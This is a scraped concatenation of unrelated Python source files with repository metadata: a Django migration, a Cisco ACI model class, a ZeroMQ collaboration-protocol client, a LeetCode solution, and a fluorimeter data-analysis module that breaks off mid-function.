for i in range(1 + max(hist.keys())):
units[i] = get_hist.hsize(base)
base = base << 1
for (i, v) in hist.items():
print "%s\t%d\t%d" % (units[i], i, v)
| [
"mchen@cs.stonybrook.edu"
] | mchen@cs.stonybrook.edu |
faee502e77cbc063c0611c552d915c8f9c8f4ed2 | 5dab7cc91892d02bb0fc23672bec6eaea2291a15 | /posts/migrations/0003_post_view_comment_count.py | 62a65319132e7532b3bca1080e1fc485532cb823 | [] | no_license | HyungJunKimAlbert/src | 75f52b8a40e6c1fa38c7cb446314d0f255c144f0 | f02fa4bf7e52f45da4b891f76d7c0a1c0d6afb74 | refs/heads/master | 2022-05-26T09:13:56.817102 | 2020-04-26T14:54:33 | 2020-04-26T14:54:33 | 259,046,728 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 386 | py | # Generated by Django 2.2.1 on 2020-04-25 10:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('posts', '0002_post_featured'),
]
operations = [
migrations.AddField(
model_name='post',
name='view_comment_count',
field=models.IntegerField(default=0),
),
]
| [
"hjkim1568@naver.com"
] | hjkim1568@naver.com |
4be510286a64309365e96715a1c1baddce168127 | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/comp/accessp.py | 6214ab713e8f774ee7c5499f70f913487eac8f0d | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 5,062 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class AccessP(Mo):
meta = ClassMeta("cobra.model.comp.AccessP")
meta.isAbstract = True
meta.moClassName = "compAccessP"
meta.moClassName = "compAccessP"
meta.rnFormat = ""
meta.category = MoCategory.REGULAR
meta.label = "Abstraction of Access Profile"
meta.writeAccessMask = 0x11
meta.readAccessMask = 0x11
meta.isDomainable = False
meta.isReadOnly = False
meta.isConfigurable = True
meta.isDeletable = True
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.parentClasses.add("cobra.model.vmm.DomP")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.pol.Def")
meta.concreteSubClasses.add("cobra.model.vmm.UsrAccP")
meta.rnPrefixes = [
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5579, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerKey", prop)
prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerTag", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Ancestor"
meta.deploymentQueryPaths.append(DeploymentPathMeta("DomainToVmmOrchsProvPlan", "Provider Plans", "cobra.model.vmm.OrchsProvPlan"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("ADomPToEthIf", "Interface", "cobra.model.l1.EthIf"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("DomainToVirtualMachines", "Virtual Machines", "cobra.model.comp.Vm"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("DomainToVmmEpPD", "Portgroups", "cobra.model.vmm.EpPD"))
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"rrishike@cisco.com"
] | rrishike@cisco.com |
d51d2bd4f6706b5327c9c09a4defd7d39ba47239 | 2d740bc48b9a4ca54941966dc6e1be6d8b8e0fc3 | /collab_protocol/python/collab_client.py | c0c22dbfaada5721eb89a0b5ec48b4cb47dc63ad | [] | no_license | dengjunquan/phase3-hurdle | 571bc23e267ecf0607230c62f82de7b0af3d9532 | b9a95abdf4d0bd291d5477542e40e2278e587dee | refs/heads/master | 2021-09-22T22:23:55.208173 | 2018-08-28T21:34:35 | 2018-09-17T18:33:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,027 | py | #!/usr/bin/env python
# encoding: utf-8
from itertools import izip
import logging
import logging.config
import os
import random
import signal
import socket
import struct
import sys
import time
import zmq
import registration_pb2 as reg
import collaboration_pb2 as collab
from argparse import ArgumentParser
from argparse import ArgumentDefaultsHelpFormatter
LOG_LEVELS = {"DEBUG":logging.DEBUG,
"INFO":logging.INFO,
"WARNING":logging.WARNING,
"ERROR":logging.ERROR,
"CRITICAL":logging.CRITICAL}
def ip_int_to_string(ip_int):
'''
Convert integer formatted IP to IP string
'''
return socket.inet_ntoa(struct.pack('!L',ip_int))
def get_all_subfields(msg_descriptor, prefix_name="", prefix_num="",
current_depth=0, max_depth=None):
'''
Recursively traverse all messages starting with the provided top level descriptor
and return a list of message names and a list of message IDs.
The message name list is formatted as a list of strings like:
"top_level_message_name.sub_message_name.sub_sub_message_name"
The message ID list is formatted as a list of strings like:
"top_level_message_id.sub_message_id.sub_sub_message_id"
'''
# keep going until we hit the max specified recursion depth
if max_depth is not None and current_depth >= max_depth:
return [], []
# get all the fields in the current message
msg_fields = msg_descriptor.fields
names_list = []
ids_list = []
# loop through each field in the current message, append the name and ID
# to the relevant lists, and recursively check for submessages
for mf in msg_fields:
full_name = "{}.{}".format(prefix_name, mf.name)
full_num = "{}.{}".format(prefix_num, mf.number)
names_list.append(full_name)
ids_list.append(full_num)
#print "{} \t {}".format(full_name, full_num)
# check for submessages
submsg_descriptor = mf.message_type
# if there are submessages, process them
if submsg_descriptor:
subnames, sub_ids = get_all_subfields(submsg_descriptor,
full_name,
full_num,
current_depth+1,
max_depth)
# append the submessage info to our tracking list
names_list.extend(subnames)
ids_list.extend(sub_ids)
return names_list, ids_list
def make_message_name_to_id_map(top_level_message_descriptor, top_level_message_name):
'''
Make a dict whose keys are message names and values are message IDs, pulled
automatically from the compiled protocol buffer file
'''
# get the list of message names and message IDs
names_list, ids_list = get_all_subfields(msg_descriptor=top_level_message_descriptor,
prefix_name=top_level_message_name,
prefix_num="0")
msg_id_map = {}
# add each message to the message map
for msg_name, msg_id in izip(names_list, ids_list):
msg_id_map[msg_name] = msg_id
return msg_id_map
def make_my_supported_message_ids(msg_map):
'''
Define a list of supported message IDs for use in the Hello message
'''
# Note that this does not support all fields in the informational declaration message
# using the mapping of names to message IDs for readability's sake
supported_msg_ids = [msg_map["collaborate.hello"],
msg_map["collaborate.hello.my_dialect"],
msg_map["collaborate.hello.my_network_id"],
msg_map["collaborate.informational_declaration"],
msg_map["collaborate.informational_declaration.statement_id"],
msg_map["collaborate.informational_declaration.my_network_id"],
msg_map["collaborate.informational_declaration.performance"],
msg_map["collaborate.informational_declaration.performance.scalar_performance"],
]
return supported_msg_ids
def parse_args(argv):
'''Command line options.'''
if argv is None:
argv = sys.argv
else:
sys.argv.extend(argv)
# Setup argument parser ArgumentDefaultsHelpFormatter
parser = ArgumentParser( formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument("--server-ip", default="127.0.0.1", help="IP address of Collaboration Server")
parser.add_argument("--server-port", default=5556, type=int, help="Port the server is listening on")
parser.add_argument("--client-ip", default="127.0.0.1", help="IP address this client is listening on")
parser.add_argument("--client-port", default=5557, type=int, help="Port the client listens to for messages from the server")
parser.add_argument("--peer-port", default=5558, type=int, help="Port the client listens to for peer-to-peer messages")
parser.add_argument("--message-timeout", default=5.0, type=float, help="Timeout for messages sent to the server or peers")
parser.add_argument("--log-config-filename", default="collab_client_logging.conf",
help="Config file for logging module")
# Process arguments
args = vars(parser.parse_args())
return args
class CollabClient(object):
'''
Top level object that runs a very simplistic client. This is not likely to be performant
for any appreciable amount of messaging traffic. This code is an example of how to
interact with the server and parse peer messages, but use at your own risk if this is
included in competition code
'''
def __init__(self, server_host="127.0.0.1", server_port=5556,
client_host="127.0.0.1", client_port=5557,
peer_port=5558, message_timeout=5.0,
log_config_filename="logging.conf"):
# set up logging
logging.config.fileConfig(log_config_filename)
self.log = logging.getLogger("collab_client")
self.server_host = server_host
self.server_port = server_port
self.client_host = client_host
self.client_port = client_port
self.peer_port = peer_port
# convert IP address from string to packed bytes representation
self.client_ip_bytes = struct.unpack('!L',socket.inet_aton(self.client_host))[0]
self.max_keepalive = None
# being late is expensive so building in a buffer.
# we multiply our computed initial keepalive timer value by this scale factor
# to build in some margin in our reply time
self.keepalive_safety_margin = 0.75
self.keepalive_counter = None
self.my_nonce = None
# initialize a statement id counter
self.statement_counter = 1
self.peers = {}
# This sets up a handler for each type of server message I support
self.server_msg_handlers = {
"inform":self.handle_inform,
"notify":self.handle_notify,
}
# This sets up a handler for each top level peer message I support
self.peer_msg_handlers = {
"hello":self.handle_hello,
"informational_declaration":self.handle_informational_declaration,
}
# This sets up a handler for each Declaration message type I support
self.declaration_handlers = {"performance":self.handle_performance}
# This sets up a handler for each Performance message type I support
self.performance_handlers = {"scalar_performance":self.handle_scalar_performance}
# This controls how long the client will try to send messages to other endpoints before
# throwing a warning and giving up
self.message_timeout = float(message_timeout)
# initialize my message ID map used for readability
self.msg_map = make_message_name_to_id_map(collab.Collaborate.DESCRIPTOR,
"collaborate")
# store of the list of message IDs I support
self.my_supported_msg_ids = make_my_supported_message_ids(self.msg_map)
def setup(self):
'''
Set up initial zeromq connections.
The client needs to start up its main listener for incoming messages from the server
and a separate socket to handle messages coming from peers. It will also set up a
poller for both sockets to allow it to service server and peer connections without
blocking
'''
self.z_context = zmq.Context()
self.poller = zmq.Poller()
# initialize the listening socket for the server
self.listen_socket = self.z_context.socket(zmq.PULL)
self.poller.register(self.listen_socket, zmq.POLLIN)
self.listen_socket.bind("tcp://%s:%s" % (self.client_host,self.client_port))
self.log.info("Collaboration client listening on host %s and port %i",
self.client_host, self.client_port)
# initialize the listening socket for peers
self.peer_pull_socket = self.z_context.socket(zmq.PULL)
self.poller.register(self.peer_pull_socket, zmq.POLLIN)
self.peer_pull_socket.bind("tcp://%s:%s" % (self.client_host,self.peer_port))
self.log.info("Collaboration client listening for peers on host %s and port %i",
self.client_host, self.peer_port)
self.log.info("Connecting to server on host %s and port %i",
self.server_host, self.server_port)
# initialize the push socket for sending registration and heartbeat messages to
# the server
self.server_socket = self.z_context.socket(zmq.PUSH)
self.poller.register(self.server_socket, zmq.POLLOUT)
self.server_socket.connect("tcp://%s:%i" % (self.server_host, self.server_port))
self.log.debug("Connected to server")
def teardown(self):
'''
Close out zeroMQ connections and zeroMQ context cleanly
'''
self.log.debug("Shutting down sockets")
# unregister from the poller and close the server listening socket
self.poller.unregister(self.listen_socket)
self.listen_socket.close()
# unregister from the poller and close the server push socket
self.poller.unregister(self.server_socket)
self.server_socket.close()
# unregister from the poller and close the peer listening socket
self.poller.unregister(self.peer_pull_socket)
self.peer_pull_socket.close()
# cleanup any resources allocated for each peer
peer_id_list = self.peers.keys()
for peer_id in peer_id_list:
self.cleanup_peer(peer_id)
self.z_context.term()
self.log.info("shutdown complete")
def send_with_timeout(self, sock, message, timeout):
'''
Try to send a message with some timeout to prevent a single endpoint from
makeing me wait forever on a response
'''
tick = time.time()
tock = time.time()
success = False
# check if an endpoint is open and ready to accept a message. If the endpoint
# is ready, send the message. If we reach the timeout before an endpoint appears to be
# ready, give up on the message and log an error
while tock-tick < timeout and success == False:
self.log.debug("Trying to send message")
socks = dict(self.poller.poll())
if sock in socks and socks[sock] == zmq.POLLOUT:
self.log.debug("Socket ready, sending")
sock.send(message.SerializeToString())
success = True
else:
self.log.warn("Tried to send message, endpoint is not connected. Retrying")
time.sleep(1)
tock=time.time()
if not success:
self.log.error("Could not send message after %f seconds", timeout)
else:
self.log.debug("Message sent")
return
def list_peers(self):
'''
Generate a list of peers I know about
'''
peer_addresses = [val["ip_address"] for key, val in self.peers.items()]
return peer_addresses
def add_peer(self, ip):
'''
I've been informed of a new peer. Add it to the list of peers I'm tracking
'''
self.log.info("adding peer %i", ip)
ip_string = ip_int_to_string(ip)
self.log.debug("trying to connect to peer at IP: %s and port %i",
ip_string, self.client_port)
# create a socket for my new peer
peer_socket = self.z_context.socket(zmq.PUSH)
peer_socket.connect("tcp://%s:%i" % (ip_string,self.peer_port))
# add socket to poller
self.poller.register(peer_socket, zmq.POLLOUT)
# store off new peer
self.peers[ip] = {"ip_address":ip,
"ip_string":ip_string,
"socket":peer_socket}
peer_addresses = self.list_peers()
self.log.debug("list of peers: %s",peer_addresses)
# send a Hello message to the new client
self.send_hello(self.peers[ip])
return
def cleanup_peer(self, ip):
'''
Releae any resources allocated for the peer associated with the given IP
'''
# close socket to old peer
peer_socket = self.peers[ip]["socket"]
self.poller.unregister(peer_socket)
peer_socket.setsockopt(zmq.LINGER, 0)
peer_socket.close()
self.log.info("Removing peer %s", ip_int_to_string(ip))
del self.peers[ip]
return
def handle_inform(self, message):
'''
I received an inform message. Set up my keepalive timer and store off the peers
'''
self.log.info("Received Inform message")
inform = message.inform
# store off the nonce and max keepalive timer value the server told me
self.my_nonce = inform.client_nonce
self.max_keepalive = inform.keepalive_seconds
# store off my neighbor contact info
neighbors = inform.neighbors
self.log.debug("Inform message contents: %s", message)
for n in neighbors:
if n != self.client_ip_bytes:
self.add_peer(n)
return
def handle_notify(self, message):
'''
The server has given me an update on my peers list. Handle these updates
'''
self.log.info("Received Notify message")
neighbors = message.notify.neighbors
# find new peers
# check list for new peers. Do initial setup required for any new peers
for n in neighbors:
if n not in self.peers and n != self.client_ip_bytes:
self.add_peer(n)
# stop tracking peers that have left
current_peers = self.peers.keys()
for p in current_peers:
if p not in neighbors:
self.cleanup_peer(p)
return
def handle_hello(self, message):
'''
I've received a hello message from a peer. Right now this only prints the message
'''
self.log.info("Received Hello message from peer %i",message.hello.my_network_id)
self.log.debug("Hello Full Contents: %s",message.hello)
return
def handle_informational_declaration(self, message):
'''
I've received a declaration from my peer. This doesn't do much right now
'''
statement_id = message.informational_declaration.statement_id
network_id = message.informational_declaration.my_network_id
self.log.info("Received declaration message id %i from peer %s",
statement_id, ip_int_to_string(network_id))
self.log.debug("Message full contents: %s", message)
declaration = message.informational_declaration
try:
# this is a simple way to handle declarations that does not account
# for any associations
if len(declaration.demand) > 0:
self.log.warn("Demand messages not implemented")
if len(declaration.resource) > 0:
self.log.warn("Resource messages not implemented")
if len(declaration.performance) > 0:
handler = self.declaration_handlers["performance"]
for p in declaration.performance:
handler(p)
if len(declaration.observation) > 0:
self.log.warn("Observation messages not implemented")
except KeyError as err:
self.log.warn("received unknown message type %s", err)
def handle_performance(self, performance):
'''
Message handler for Performance messages
'''
self.log.debug("Declaration message was a Performance message")
try:
handler = self.performance_handlers[performance.WhichOneof("payload")]
handler(performance)
except KeyError as err:
self.log.warn("received unknown message type %s", err)
def handle_scalar_performance(self, performance):
'''
Message handler for Scalar Performance messages
'''
self.log.debug("Performance message was a Scalar Performance message")
self.log.info("Scalar performance was %f",performance.scalar_performance)
def send_register(self):
'''
Generate a register message and send it to the collaboration server
'''
self.log.info("sending register message to server")
# construct message to send to server
message = reg.TalkToServer()
message.register.my_ip_address = self.client_ip_bytes
self.log.debug("register message contents: %s", message)
# serialize and send message to server
self.send_with_timeout(sock=self.server_socket,
message=message,
timeout=self.message_timeout)
def send_keepalive(self):
'''
Generate a keepalive message and send it to the collaboration server
'''
self.log.info("sending keepalive")
# construct message to send to server
message = reg.TalkToServer()
message.keepalive.my_nonce = self.my_nonce
self.log.debug("keepalive message contents: %s", message)
# serialize and send message to server
self.send_with_timeout(sock=self.server_socket,
message=message,
timeout=self.message_timeout)
def send_leave(self):
'''
Be polite and tell everyone that we are leaving the collaboration network
'''
self.log.info("sending leave message")
# construct message to send to server
message = reg.TalkToServer()
message.leave.my_nonce = self.my_nonce
self.log.debug("leave message contents: %s", message)
# serialize and send message to server
self.send_with_timeout(sock=self.server_socket,
message=message,
timeout=self.message_timeout)
def send_hello(self, peer):
'''
Send a hello message to my peer
'''
self.log.info("sending hello message to peer %s", peer["ip_string"])
# Create the top level Collaborate message wrapper
message = collab.Collaborate()
# add to the supported declaration and performance lists using the extend()
# method
message.hello.my_dialect.extend(self.my_supported_msg_ids)
# set my network ID to my IP address (on the collaboration protocol network)
message.hello.my_network_id = self.client_ip_bytes
self.log.debug("Hello message contents: %s", message)
# serialize and send message to peer
self.send_with_timeout(sock=peer["socket"],
message=message,
timeout=self.message_timeout)
def send_performance(self, peer, scalar_performance):
'''
Send a scalar performance declaration to my peer
'''
self.log.info("sending performance to peer %s", peer["ip_string"])
message = collab.Collaborate()
message.informational_declaration.statement_id = self.statement_counter
message.informational_declaration.my_network_id = self.client_ip_bytes
# create a new performance object in the informational_declaration performance list
# and update it with a new value using the add() method
performance = message.informational_declaration.performance.add()
performance.scalar_performance = scalar_performance
self.log.debug("Performance message contents: %s", message)
# increment the statement counter
self.statement_counter = self.statement_counter + 1
# serialize and send message to peer
self.send_with_timeout(sock=peer["socket"],
message=message,
timeout=self.message_timeout)
def manage_keepalives(self):
'''
Keep track of my keepalive counter and ensure I send a new keepalive message to the
server with some random counter and a safety margin to make sure the server isn't
hit by too many keepalive messages simultaneously and also to ensure I'm not late
'''
tock = time.time()
elapsed_time = tock - self.tick
# is it time to send the keepalive?
if elapsed_time >= self.keepalive_counter:
self.tick = tock
self.send_keepalive()
# picking a new keepalive counter at random so the server is
# less likely to get bogged down by a bunch of requests at once.
new_count = random.random()*self.max_keepalive
# building in a fudge factor so we'll always be well below the max
# timeout
self.keepalive_counter = new_count * self.keepalive_safety_margin
self.log.debug("starting new keepalive timer of %f seconds",
self.keepalive_counter)
return
def run(self):
'''
Run the client's event loop.
This is not expected to keep up with high update rates, only as an example of how
to send messages and handle messages sent to me
'''
self.tick = time.time()
self.log.info("Sending register message")
self.send_register()
last_performance_update = 0
# arbitrarily chosen update period
performance_update_period = 20
while True:
# manage the keepalive counter. Don't bother until the server
# tells us what the keepalive max should be
if self.max_keepalive is not None:
self.manage_keepalives()
socks = dict(self.poller.poll())
if time.time() - last_performance_update > performance_update_period:
# if it's time to send out a performance update, check if there
# are any peers. If so, pick one at random and send it an update.
if len(self.peers) > 0:
scalar_performance = random.random()
peer_id = random.choice(self.peers.keys())
self.send_performance(self.peers[peer_id], scalar_performance)
last_performance_update = time.time()
# look for a new message from either a peer or the server
# Polling may not be that efficient, but this is an example of using
# the code and talking to the server and peers. This is not intended
# to be a competition ready client.
if self.listen_socket in socks:
self.log.debug("processing message from server")
# get a message off the server listening socket and deserialize it
raw_message = self.listen_socket.recv()
message = reg.TellClient.FromString(raw_message)
self.log.debug("message was %s", message)
# find and run the appropriate handler
try:
handler = self.server_msg_handlers[message.WhichOneof("payload")]
handler(message)
except KeyError as err:
self.log.error("received unsupported message type %s", err)
# check for new messages from my peers
elif self.peer_pull_socket in socks:
self.log.debug("processing message from peer")
# get a message off the peer listening socket and deserialize it
raw_message = self.peer_pull_socket.recv()
message = collab.Collaborate.FromString(raw_message)
self.log.debug("message was %s", message)
# find and run the appropriate handler
try:
handler = self.peer_msg_handlers[message.WhichOneof("payload")]
handler(message)
except KeyError as err:
self.log.warn("received unhandled message type %s", err)
else:
time.sleep(0.5)
def handle_sigterm(signal, frame):
'''
Catch SIGTERM and signal the script to exit gracefully
'''
raise KeyboardInterrupt
def main(argv=None):
print("Collaboration Client starting, CTRL-C to exit")
# parse command line args
args = parse_args(argv)
collab_client = CollabClient(server_host=args["server_ip"], server_port=args["server_port"],
client_host=args["client_ip"], client_port=args["client_port"],
peer_port=args["peer_port"],
log_config_filename=args["log_config_filename"])
collab_client.setup()
try:
collab_client.run()
except KeyboardInterrupt:
print("interrupt received, stopping...")
try:
collab_client.send_leave()
except TypeError as err:
print("error while shutting down:", err)
collab_client.teardown()
if __name__ == "__main__":
main()
| [
"craig.pomeroy.ctr@darpa.mil"
] | craig.pomeroy.ctr@darpa.mil |
9e03554339fbf11a977d749579273a5308ebe17c | 0ba1743e9f865a023f72a14d3a5c16b99ee7f138 | /problems/test_0413_dp.py | b94b4a4005613d47a4b97b5eda809a2ed0f42f15 | [
"Unlicense"
] | permissive | chrisxue815/leetcode_python | d0a38a4168243b0628256825581a6df1b673855c | a33eb7b833f6998972e5340d383443f3a2ee64e3 | refs/heads/main | 2022-06-20T15:09:27.221807 | 2022-06-02T21:55:35 | 2022-06-02T21:55:35 | 94,590,264 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 997 | py | import unittest
import utils
# O(n^2) time. O(n) space. DP.
class Solution:
def numberOfArithmeticSlices(self, a):
"""
:type a: List[int]
:rtype: int
"""
# Common difference
dp = [0] * len(a)
result = 0
for p in range(len(a) - 1):
q = p + 1
dp[p] = a[q] - a[p]
for distance in range(2, len(a)):
for p in range(len(a) - distance):
q = p + distance
if dp[p] == a[q] - a[q - 1]:
result += 1
else:
dp[p] = None
return result
class Test(unittest.TestCase):
def test(self):
cases = utils.load_test_json(__file__).test_cases
for case in cases:
args = str(case.args)
actual = Solution().numberOfArithmeticSlices(**case.args.__dict__)
self.assertEqual(case.expected, actual, msg=args)
if __name__ == '__main__':
unittest.main()
| [
"chrisxue815@gmail.com"
] | chrisxue815@gmail.com |
243ac0fbe36422f9fa269aca5648dd83705bf943 | 92162f0d96820c73f03c92b402f7cc3c95823b30 | /HelpfulFunctions.py | 47606cc01398ce0526fce8dc6e4824f0bab22dab | [] | no_license | TrevorDemille/Simple-Analysis-App | f59ec56c653ae5f4196a8e317048d976d78bb604 | e9d1ab29138ceb36f24e186cba0cf5314feee5dc | refs/heads/master | 2021-01-12T10:16:13.041863 | 2016-12-13T22:57:25 | 2016-12-13T22:57:25 | 76,405,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,401 | py | import numpy as np
import matplotlib.pyplot as plt
import glob
import os
from pH import *
from Parser import *
#
#Written by Trevor Demille, Summer 2016, Goldner Biophysics Group
"""
List of functions necessary/helpful in the analysis of Fluorimeter and Dynamic Light Scattering data.
Data is all taken to either be in the CSV or TXT format.
Some conditions on the plotting of data such as the concentrations, iterations, and legends must be maually
edited in the code here.
A copy of this file as well as the Parser.py an pH.py python files must be saved in the program files directory where
the master storage for local python libraries is kept. (ie C_drive-->Program Files-->Python2.7)
"""
#Function to import and parse out data from text files
def loadData(fileName, fileNum):
#fileName must be of the format: "directory/subdirectory/*.txt" where .txt is the matching
#glob is going to find and from which it will choose which files to import. This must be the ending of a filename,
#not some random part of the filename, and fileNum is the number of files in the directory
path1 = 'C:/Users/tdemille/Desktop/UMA/Sublime/Python/Text Files for pH'
inputPath = os.path.join(path1, fileName)
#
all_txts = glob.iglob(inputPath)
print(all_txts)
#
columnFiles = [None] * fileNum
counter = 0 #My poor solution to iterating unevenly is counter variables. Ehh...
for dataFile in all_txts:
data = np.loadtxt(dataFile)
#
columnFiles[counter] = data
counter=counter+1
return columnFiles
def solvepH(R,S):
#For finding individual pH's based on individual inputs of ratio and std dev
print(get_pH(R,S))
#
self.Rentry.delete(0,'end')
self.Sentry.delete(0,'end')
def parseFile(Dir, File):
#Parse a CSV file of the full time, intensity, and background data and save as seperate csv files of the desired bkg and intensities
#for each individually exported group of data, not the session as a whole (D1, D2, etc)
Parser(Dir, File)
#
def Indiv_Ratios(D1file,D2file,bkg1,bkg2,cNum,legd,titl):
#Assign the lengths of columns and rows to a value
Dcols = len(D1file[0,:])
Drows = len(D1file[:,0])-1 #rows are always over counted by 1 due to 0-indexing
rTotal = Drows*10
bkgCols = len(bkg1[0,:])
#Set up matrices to store value solved for in the for loop
D1bkg = [None] * bkgCols
D2bkg = [None] * bkgCols
#Take means of background file columns, as there are half the number of background measurements
#as there are fluorescein intensity measurements. This is just each column's mean value
for jj in range(bkgCols):
D1bkg[jj] = np.mean(bkg1[:,jj], dtype=np.float64)
D2bkg[jj] = np.mean(bkg2[:,jj], dtype=np.float64)
#Background files must be resized so that every 5 values (assigned to each concentration) can be taken for a mean
D1bkg = np.array(D1bkg)
D1meanBkg = np.mean(D1bkg.reshape(-1,5), axis=1)
D2bkg = np.array(D2bkg)
D2meanBkg = np.mean(D2bkg.reshape(-1,5), axis=1)
#Set up counters so the loop ahead can keep all the indexes on track, and set up empty matrices
ratTot = Dcols*Drows
ratios = np.array([])
D1use = np.array([])
D2use = np.array([])
bkgIndex = 0
count = 1
countr = 0
countT = 0
#
#Loop to subtract the background from D1 & D2, and to solve for ratios of each concentration mean.
for cc in range(Dcols):
if count % 10 == 1:
bkgIndex = bkgIndex+1
for rr in range(Drows):
D1use = np.append(D1use, (D1file[rr,cc]-D1meanBkg[bkgIndex-1]))
D2use = np.append(D2use, (D2file[rr,cc]-D2meanBkg[bkgIndex-1]))
result = (D1use[countT+countr]-D2use[countT+countr]) / (D1use[countT+countr]+D2use[countT+countr])
ratios = np.append(ratios, result)
#
countr = countr+1
countT = cc*Drows
countr = 0
count = count+1
#Split up the ratio values by concentration
val2 = 1
sub_RatList = [None]*cNum
sub_RatRange = [None]*cNum
ratList = [None]*cNum
ratRange = [None]*cNum
for tt in range(cNum):
sub_RatList[tt] = ratios[(tt*rTotal+1):(val2*rTotal)]
sub_RatRange[tt] = xrange((tt*rTotal+1),(val2*rTotal))
ratList[tt] = sub_RatList[tt]
ratRange[tt] = sub_RatRange[tt]
val2=val2+1
#plot everything up individually such that the colors can be changed.
#The legend has to be manually altered as the concentrations change from measurement to measurement
colorInd = ['ro','bo','ko','mo','yo','go','co','ro','bo','ko','mo','yo','go','co','ro','bo','ko']
f, fig1 = plt.subplots()
for hh in range(cNum):
fig1.plot(ratRange[hh],ratList[hh],colorInd[hh])
#fig1.plot(R7,rat7,'yo')
fig1.set_xlabel('Index', fontsize=15)
fig1.set_ylabel('Ratio', fontsize=15)
fig1.set_title(titl, fontsize=18)
#fig1.legend(['1:100','1:200','1:300','1:400'],numpoints=1,loc=3,frameon=False)
fig1.legend(['0M','1uM','30uM','100uM','300uM','1mM','3mM','5mM','7.5mM','10mM','15mM','30mM','100mM','200mM'], numpoints=1, loc=4, frameon=False)
def Mean_Ratios(D1file,D2file,bkg1,bkg2,cNum,legd,titl1,titl2):
#Function to find the means of all the D1 and D2 intensity data found by measuring the 514nm and 550nm
#emission of fluorescein. This data is taken as 10 sets of 16 measurements for each concentration of surfactant.
#The mean of each 16 measurements is taken, and the std dev found. the mean of these 10 means is then taken, and
#its stdev is found.
Dcols = len(D1file[0,:])
Drows = len(D1file[:,0])-1
bkgCols = len(bkg1[0,:])
#Set up matrices to store data in loop. This isn't the most eficient way, but it works for now.
D1meanList = [None] * Dcols
D2meanList = [None] * Dcols
D1stdList = [None] * Dcols
D2stdList = [None] * Dcols
D1bkg = [None] * bkgCols
D2bkg = [None] * bkgCols
#Loop to take means and std dev of each column of intensity data
for i in range(Dcols):
D1meanList[i] = np.mean(D1file[:,i], dtype=np.float64)
D2meanList[i] = np.mean(D2file[:,i], dtype=np.float64)
